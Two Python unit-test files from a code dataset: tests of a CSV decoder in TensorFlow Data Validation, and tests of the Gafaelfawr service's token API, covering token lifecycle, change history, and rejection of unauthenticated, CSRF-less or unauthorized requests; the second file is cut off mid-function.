13f0f90398b606401aa2aac66a4cd9e077d62b6e | 15,942 | py | Python | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | 1 | 2020-11-08T17:03:55.000Z | 2020-11-08T17:03:55.000Z | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | null | null | null | tensorflow_data_validation/coders/csv_decoder_test.py | santosh-d3vpl3x/data-validation | b4809803be2d1a0490546f2d21dd4cb7244e6323 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for CSV decoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
from absl.testing import absltest
import apache_beam as beam
from apache_beam.testing import util
from tensorflow_data_validation.coders import csv_decoder
from tensorflow_data_validation.pyarrow_tf import pyarrow as pa
from tensorflow_data_validation.utils import test_util
from google.protobuf import text_format
from tensorflow_metadata.proto.v0 import schema_pb2
class CSVDecoderTest(absltest.TestCase):
"""Tests for CSV decoder."""
def test_csv_decoder(self):
input_lines = ['1,2.0,hello',
'5,12.34,world']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[2.0], [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], [b'world']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_schema(self):
input_lines = ['1,1,2.0,hello',
'5,5,12.34,world']
column_names = ['int_feature_parsed_as_float', 'int_feature',
'float_feature', 'str_feature']
schema = text_format.Parse(
"""
feature { name: "int_feature_parsed_as_float" type: FLOAT }
feature { name: "int_feature" type: INT }
feature { name: "float_feature" type: FLOAT }
feature { name: "str_feature" type: BYTES }
""", schema_pb2.Schema())
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.float32())),
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[2.0], [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], [b'world']], pa.list_(pa.binary())),
], ['int_feature_parsed_as_float', 'int_feature',
'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names, schema=schema,
infer_type_from_schema=True))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_missing_values(self):
input_lines = ['1,,hello',
',12.34,']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], None], pa.list_(pa.int64())),
pa.array([None, [12.34]], pa.list_(pa.float32())),
pa.array([[b'hello'], None], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_int_and_float_in_same_column(self):
input_lines = ['2,1.5',
'1.5,2']
column_names = ['float_feature1', 'float_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[2.0], [1.5]], pa.list_(pa.float32())),
pa.array([[1.5], [2.0]], pa.list_(pa.float32())),
], ['float_feature1', 'float_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_int_and_string_in_same_column(self):
input_lines = ['2,abc',
'abc,2']
column_names = ['str_feature1', 'str_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'2'], [b'abc']], pa.list_(pa.binary())),
pa.array([[b'abc'], [b'2']], pa.list_(pa.binary())),
], ['str_feature1', 'str_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_float_and_string_in_same_column(self):
input_lines = ['2.3,abc',
'abc,2.3']
column_names = ['str_feature1', 'str_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'2.3'], [b'abc']], pa.list_(pa.binary())),
pa.array([[b'abc'], [b'2.3']], pa.list_(pa.binary())),
], ['str_feature1', 'str_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_unicode(self):
input_lines = [u'1,שקרכלשהו,22.34,text field']
column_names = ['int_feature', 'unicode_feature',
'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
pa.array([[22.34]], pa.list_(pa.float32())),
pa.array([[u'שקרכלשהו'.encode('utf-8')]], pa.list_(pa.binary())),
pa.array([[b'text field']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'unicode_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_csv_record_with_quotes(self):
input_lines = ['1,"ab,cd,ef"',
'5,"wx,xy,yz"']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'ab,cd,ef'], [b'wx,xy,yz']], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_space_delimiter(self):
input_lines = ['1 "ab,cd,ef"',
'5 "wx,xy,yz"']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'ab,cd,ef'], [b'wx,xy,yz']], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
delimiter=' '))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_with_tab_delimiter(self):
input_lines = ['1\t"this is a \ttext"',
'5\t']
column_names = ['int_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1], [5]], pa.list_(pa.int64())),
pa.array([[b'this is a \ttext'], None], pa.list_(pa.binary())),
], ['int_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
delimiter='\t'))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_negative_values(self):
input_lines = ['-34', '45']
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[-34], [45]], pa.list_(pa.int64())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_int64_max(self):
input_lines = ['34', str(sys.maxsize)]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[34], [sys.maxsize]], pa.list_(pa.int64())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_pos(self):
input_lines = ['34', str(sys.maxsize+1)]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'34'], [str(sys.maxsize + 1).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_neg(self):
input_lines = ['34', str(-(sys.maxsize+2))]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[b'34'], [str(-(sys.maxsize + 2)).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_large_int_categorical_pos_and_neg(self):
input_lines = [str(sys.maxsize+1), str(-(sys.maxsize+2))]
column_names = ['feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[str(sys.maxsize + 1).encode('utf-8')],
[str(-(sys.maxsize + 2)).encode('utf-8')]],
pa.list_(pa.binary())),
], ['feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_empty_row(self):
input_lines = [',,',
'1,2.0,hello']
column_names = ['int_feature', 'float_feature', 'str_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
pa.array([None, [2.0]], pa.list_(pa.float32())),
pa.array([None, [b'hello']], pa.list_(pa.binary())),
], ['int_feature', 'float_feature', 'str_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_skip_blank_line(self):
input_lines = ['',
'1,2']
column_names = ['int_feature1', 'int_feature2']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
pa.array([[2]], pa.list_(pa.int64())),
], ['int_feature1', 'int_feature2'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_consider_blank_line(self):
input_lines = ['',
'1,2.0']
column_names = ['int_feature', 'float_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
pa.array([None, [2.0]], pa.list_(pa.float32())),
], ['int_feature', 'float_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
skip_blank_lines=False))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_skip_blank_line_single_column(self):
input_lines = ['',
'1']
column_names = ['int_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([[1]], pa.list_(pa.int64())),
], ['int_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_consider_blank_line_single_column(self):
input_lines = ['',
'1']
column_names = ['int_feature']
expected_result = [
pa.Table.from_arrays([
pa.array([None, [1]], pa.list_(pa.int64())),
], ['int_feature'])
]
with beam.Pipeline() as p:
result = (p | beam.Create(input_lines) |
csv_decoder.DecodeCSV(column_names=column_names,
skip_blank_lines=False))
util.assert_that(
result,
test_util.make_arrow_tables_equal_fn(self, expected_result))
def test_csv_decoder_empty_csv(self):
    """An empty input PCollection produces no output tables."""
    with beam.Pipeline() as p:
        decoded = (
            p
            | beam.Create([])
            | csv_decoder.DecodeCSV(column_names=[]))
        util.assert_that(
            decoded,
            test_util.make_arrow_tables_equal_fn(self, []))
def test_csv_decoder_invalid_row(self):
    """A row whose column count does not match the headers fails decoding.

    The second row has only two values for three declared columns, so the
    pipeline should fail with a ValueError.
    """
    input_lines = ['1,2.0,hello',
                   '5,12.34']
    column_names = ['int_feature', 'float_feature', 'str_feature']
    # assertRaisesRegexp is a deprecated alias; use assertRaisesRegex.
    with self.assertRaisesRegex(
        ValueError, '.*Columns do not match specified csv headers.*'):
        with beam.Pipeline() as p:
            result = (p | beam.Create(input_lines) |
                      csv_decoder.DecodeCSV(column_names=column_names))
            util.assert_that(
                result,
                test_util.make_arrow_tables_equal_fn(self, None))
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    absltest.main()
| 36.231818 | 79 | 0.5966 | 2,004 | 15,942 | 4.438623 | 0.0998 | 0.079146 | 0.035975 | 0.042046 | 0.809331 | 0.800112 | 0.794379 | 0.766161 | 0.756043 | 0.742215 | 0 | 0.019717 | 0.25875 | 15,942 | 439 | 80 | 36.314351 | 0.733012 | 0.038138 | 0 | 0.642857 | 0 | 0 | 0.094028 | 0.004977 | 0 | 0 | 0 | 0 | 0.063187 | 1 | 0.06044 | false | 0 | 0.032967 | 0 | 0.096154 | 0.002747 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b94192ecf775c96cd3fda0bebde6415b062befb9 | 31,986 | py | Python | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | null | null | null | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | 155 | 2020-05-29T17:21:13.000Z | 2022-03-28T19:55:52.000Z | tests/handlers/api_tokens_test.py | lsst-sqre/gafaelfawr | 5d965e9d7901987ef041fd341637d75407b55227 | [
"MIT"
] | 3 | 2021-04-26T18:02:58.000Z | 2022-02-03T01:29:13.000Z | """Tests for the ``/auth/api/v1/users/*/tokens`` and related routes."""
from __future__ import annotations
import time
from datetime import datetime, timedelta, timezone
from typing import TYPE_CHECKING
from unittest.mock import ANY
import pytest
from gafaelfawr.constants import COOKIE_NAME
from gafaelfawr.models.state import State
from gafaelfawr.models.token import Token, TokenGroup, TokenUserInfo
from gafaelfawr.util import current_datetime
from tests.support.constants import TEST_HOSTNAME
from tests.support.logging import parse_log
if TYPE_CHECKING:
from _pytest.logging import LogCaptureFixture
from tests.support.setup import SetupTest
@pytest.mark.asyncio
async def test_create_delete_modify(
setup: SetupTest, caplog: LogCaptureFixture
) -> None:
"""Exercise the full user-token lifecycle through the API.

Creates a user token, reads it back (both directly and via the
token-info route), lists tokens, modifies the token, checks the log
output of the modification, deletes the token, and finally inspects the
recorded change history.
"""
user_info = TokenUserInfo(
username="example",
name="Example Person",
email="example@example.com",
uid=45613,
groups=[TokenGroup(name="foo", id=12313)],
)
token_service = setup.factory.create_token_service()
session_token = await token_service.create_session_token(
user_info,
scopes=["read:all", "exec:admin", "user:token"],
ip_address="127.0.0.1",
)
csrf = await setup.login(session_token)
# Create a user token with an explicit expiration and confirm the
# Location header points at the new resource.
expires = current_datetime() + timedelta(days=100)
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": csrf},
json={
"token_name": "some token",
"scopes": ["read:all"],
"expires": int(expires.timestamp()),
},
)
assert r.status_code == 201
assert r.json() == {"token": ANY}
user_token = Token.from_str(r.json()["token"])
token_url = r.headers["Location"]
assert token_url == f"/auth/api/v1/users/example/tokens/{user_token.key}"
r = await setup.client.get(token_url)
assert r.status_code == 200
info = r.json()
assert info == {
"token": user_token.key,
"username": "example",
"token_name": "some token",
"token_type": "user",
"scopes": ["read:all"],
"created": ANY,
"expires": int(expires.timestamp()),
}
# Check that this is the same information as is returned by the token-info
# route. This is a bit tricky to do since the cookie will take precedence
# over the Authorization header, but we can't just delete the cookie since
# we'll lose the CSRF token. Save the cookie and delete it, and then
# later restore it.
cookie = setup.client.cookies.pop(COOKIE_NAME)
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {user_token}"},
)
assert r.status_code == 200
assert r.json() == info
setup.client.cookies.set(COOKIE_NAME, cookie, domain=TEST_HOSTNAME)
# Listing all tokens for this user should return the user token and a
# session token.
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 200
data = r.json()
# Adjust for sorting, which will be by creation date and then token.
assert len(data) == 2
if data[0] == info:
session_info = data[1]
else:
assert data[1] == info
session_info = data[0]
assert session_info == {
"token": session_token.key,
"username": "example",
"token_type": "session",
"scopes": ["exec:admin", "read:all", "user:token"],
"created": ANY,
"expires": ANY,
}
# Change the name, scope, and expiration of the token.
caplog.clear()
new_expires = current_datetime() + timedelta(days=200)
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={
"token_name": "happy token",
"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
},
)
assert r.status_code == 201
assert r.json() == {
"token": user_token.key,
"username": "example",
"token_name": "happy token",
"token_type": "user",
"scopes": ["exec:admin"],
"created": ANY,
"expires": int(new_expires.timestamp()),
}
# Check the logging. Regression test for a bug where new expirations
# would be logged as raw datetime objects instead of timestamps.
assert parse_log(caplog) == [
{
"expires": int(new_expires.timestamp()),
"event": "Modified token",
"key": user_token.key,
"level": "info",
"method": "PATCH",
"path": token_url,
"remote": "127.0.0.1",
"scope": "exec:admin read:all user:token",
"token": session_token.key,
"token_name": "happy token",
"token_scope": "exec:admin",
"token_source": "cookie",
"user": "example",
}
]
# Delete the token.
r = await setup.client.delete(token_url, headers={"X-CSRF-Token": csrf})
assert r.status_code == 204
r = await setup.client.get(token_url)
assert r.status_code == 404
# Deleting again should return 404.
r = await setup.client.delete(token_url, headers={"X-CSRF-Token": csrf})
assert r.status_code == 404
# This user should now have only one token.
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 200
assert len(r.json()) == 1
# We should be able to see the change history for the token.
# History entries are returned newest first: revoke, edit, create.
r = await setup.client.get(token_url + "/change-history")
assert r.status_code == 200
assert r.json() == [
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "happy token",
"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
"actor": "example",
"action": "revoke",
"ip_address": "127.0.0.1",
"event_time": ANY,
},
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "happy token",
"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
"actor": "example",
"action": "edit",
"old_token_name": "some token",
"old_scopes": ["read:all"],
"old_expires": int(expires.timestamp()),
"ip_address": "127.0.0.1",
"event_time": ANY,
},
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "some token",
"scopes": ["read:all"],
"expires": int(expires.timestamp()),
"actor": "example",
"action": "create",
"ip_address": "127.0.0.1",
"event_time": ANY,
},
]
@pytest.mark.asyncio
async def test_token_info(setup: SetupTest) -> None:
    """Check the token-info and user-info routes for session and user tokens."""
    user_info = TokenUserInfo(
        username="example",
        name="Example Person",
        email="example@example.com",
        uid=45613,
        groups=[TokenGroup(name="foo", id=12313)],
    )
    token_service = setup.factory.create_token_service()
    session_token = await token_service.create_session_token(
        user_info, scopes=["exec:admin", "user:token"], ip_address="127.0.0.1"
    )

    r = await setup.client.get(
        "/auth/api/v1/token-info",
        headers={"Authorization": f"bearer {session_token}"},
    )
    assert r.status_code == 200
    data = r.json()
    assert data == {
        "token": session_token.key,
        "username": "example",
        "token_type": "session",
        "scopes": ["exec:admin", "user:token"],
        "created": ANY,
        "expires": ANY,
    }

    # The exact timestamps cannot be predicted, so check that creation
    # happened within the last couple of seconds and that the expiration
    # matches the configured session lifetime.
    now = datetime.now(tz=timezone.utc)
    created = datetime.fromtimestamp(data["created"], tz=timezone.utc)
    assert now - timedelta(seconds=2) <= created <= now
    expires = created + timedelta(minutes=setup.config.issuer.exp_minutes)
    assert datetime.fromtimestamp(data["expires"], tz=timezone.utc) == expires

    r = await setup.client.get(
        "/auth/api/v1/user-info",
        headers={"Authorization": f"bearer {session_token}"},
    )
    assert r.status_code == 200
    session_user_info = r.json()
    assert session_user_info == {
        "username": "example",
        "name": "Example Person",
        "email": "example@example.com",
        "uid": 45613,
        "groups": [
            {
                "name": "foo",
                "id": 12313,
            }
        ],
    }

    # Check the same with a user token, which has some additional associated
    # data.
    expires = now + timedelta(days=100)
    data = await token_service.get_data(session_token)
    user_token = await token_service.create_user_token(
        data,
        data.username,
        token_name="some-token",
        scopes=["exec:admin"],
        expires=expires,
        ip_address="127.0.0.1",
    )
    r = await setup.client.get(
        "/auth/api/v1/token-info",
        headers={"Authorization": f"bearer {user_token}"},
    )
    assert r.status_code == 200
    data = r.json()
    assert data == {
        "token": user_token.key,
        "username": "example",
        "token_type": "user",
        "token_name": "some-token",
        "scopes": ["exec:admin"],
        "created": ANY,
        "expires": int(expires.timestamp()),
    }
    r = await setup.client.get(
        "/auth/api/v1/user-info",
        headers={"Authorization": f"bearer {user_token}"},
    )
    assert r.status_code == 200
    assert r.json() == session_user_info

    # Test getting a list of tokens for a user.
    state = State(token=session_token)
    r = await setup.client.get(
        "/auth/api/v1/users/example/tokens",
        cookies={COOKIE_NAME: await state.as_cookie()},
    )
    # Bug fix: this response was previously never checked, so the request
    # asserted nothing.  At minimum the route should succeed.
    assert r.status_code == 200
@pytest.mark.asyncio
async def test_auth_required(setup: SetupTest) -> None:
"""All token routes return 401 when no authentication token is present,
even if a valid CSRF token is supplied."""
token_data = await setup.create_session_token()
token = token_data.token
csrf = await setup.login(token)
# Replace the cookie with one containing the CSRF token but not the
# authentication token.
setup.logout()
setup.client.cookies[COOKIE_NAME] = await State(csrf=csrf).as_cookie()
# Every read and write route below must now be rejected with 401.
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": csrf},
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 401
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 401
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}"
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}/change-history"
)
assert r.status_code == 401
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 401
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 401
@pytest.mark.asyncio
async def test_csrf_required(setup: SetupTest) -> None:
"""Mutating routes return 403 without a valid X-CSRF-Token header."""
token_data = await setup.create_session_token(scopes=["admin:token"])
csrf = await setup.login(token_data.token)
token_service = setup.factory.create_token_service()
user_token = await token_service.create_user_token(
token_data,
token_data.username,
token_name="foo",
scopes=[],
ip_address="127.0.0.1",
)
# Each POST, DELETE, and PATCH is attempted twice: once with no CSRF
# header and once with a corrupted one.  Both must be rejected.
r = await setup.client.post(
"/auth/api/v1/tokens",
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/users/example/tokens", json={"token_name": "some token"}
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{user_token.key}"
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
headers={"X-CSRF-Token": f"XXX{csrf}"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
@pytest.mark.asyncio
async def test_no_bootstrap(setup: SetupTest) -> None:
"""The bootstrap token is rejected (401) on per-user token routes."""
token_data = await setup.create_session_token()
token = token_data.token
bootstrap_token = str(setup.config.bootstrap_token)
# Try each per-user route with the bootstrap token as the bearer token.
r = await setup.client.get(
"/auth/api/v1/users/example/tokens",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"Authorization": f"bearer {bootstrap_token}"},
json={"token_name": "some token"},
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
json={"token_name": "some token"},
)
assert r.status_code == 401
@pytest.mark.asyncio
async def test_no_scope(setup: SetupTest) -> None:
"""A token created with no scopes cannot use the token routes (403)."""
token_data = await setup.create_session_token()
token_service = setup.factory.create_token_service()
# Create a user token with an empty scope list.
token = await token_service.create_user_token(
token_data,
token_data.username,
token_name="user",
scopes=[],
ip_address="127.0.0.1",
)
# All token management routes must reject it with 403.
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"Authorization": f"bearer {token}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
@pytest.mark.asyncio
async def test_modify_nonuser(setup: SetupTest) -> None:
    """A session token cannot be modified through the user token route."""
    token_data = await setup.create_session_token()
    token = token_data.token
    csrf = await setup.login(token)

    # Attempt to rename the session token; only user tokens may be patched.
    rename_request = {"token_name": "happy token"}
    r = await setup.client.patch(
        f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
        headers={"X-CSRF-Token": csrf},
        json=rename_request,
    )
    assert r.status_code == 403
    error = r.json()["detail"][0]
    assert error["type"] == "permission_denied"
@pytest.mark.asyncio
async def test_wrong_user(setup: SetupTest) -> None:
"""A user may not view or manage another user's tokens.

Cross-user access yields 403, while requesting another user's token
under one's own username yields 404.
"""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
token_service = setup.factory.create_token_service()
# Create a second user with a session token and a user token.
user_info = TokenUserInfo(
username="other-person", name="Some Other Person", uid=137123
)
other_session_token = await token_service.create_session_token(
user_info, scopes=["user:token"], ip_address="127.0.0.1"
)
other_session_data = await token_service.get_data(other_session_token)
assert other_session_data
other_token = await token_service.create_user_token(
other_session_data,
"other-person",
token_name="foo",
scopes=[],
ip_address="127.0.0.1",
)
# Get a token list.
r = await setup.client.get("/auth/api/v1/users/other-person/tokens")
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Create a new user token.
r = await setup.client.post(
"/auth/api/v1/users/other-person/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "happy token"},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Get an individual token.
r = await setup.client.get(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}"
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Get the history of an individual token.
r = await setup.client.get(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}"
"/change-history"
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Ensure you can't see someone else's token under your username either.
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}"
)
assert r.status_code == 404
# Or their history.
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}"
"/change-history"
)
assert r.status_code == 404
# Delete a token.
r = await setup.client.delete(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}",
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
r = await setup.client.delete(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}",
